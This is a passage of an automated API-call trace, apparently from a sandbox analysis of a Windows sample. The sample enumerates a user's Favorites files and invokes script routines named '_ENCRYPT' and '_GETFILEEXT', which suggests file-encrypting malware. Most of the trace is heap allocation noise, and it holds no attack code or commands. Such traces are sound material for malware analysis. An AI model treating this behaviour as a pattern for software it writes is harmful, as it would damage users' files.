lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0180.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=79, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9e) returned 0x8f9058 [0180.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=79, lpWideCharStr=0x8f9058, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 79 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0180.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.709] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0180.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0180.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0180.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.711] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0180.711] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.712] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.713] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0180.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0180.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.714] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0180.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.714] CloseHandle (hObject=0x120) returned 1 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.715] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.716] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.716] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.716] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.716] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.716] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.716] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 